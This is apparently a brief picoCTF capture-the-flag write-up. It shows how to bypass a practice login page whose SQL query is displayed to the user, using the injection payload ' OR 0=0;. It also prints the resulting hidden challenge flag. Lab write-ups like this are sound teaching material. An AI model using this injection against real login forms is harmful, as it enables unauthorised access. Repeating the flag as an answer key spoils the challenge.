Can you login to this website?
Try to login here.
Let's randomly try logging in:
username: user
password: pass
SQL query: SELECT * FROM users WHERE name='user' AND password='pass'
Interesting. If we can get the SQL query to just select all then we should be able to get the flag. To do that, we can close the name select, add an OR and an always true statement so that the select will always select everything, then terminate it. One example of a way to make this work is ' OR 0=0;. After submitting that, it shows:
<body><pre>username: ' OR 0=0;
password:
SQL query: SELECT * FROM users WHERE name='' OR 0=0;' AND password=''
</pre><h1>Logged in! But can you see the flag, it is in plainsight.</h1><p hidden="">Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}</p></body>picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}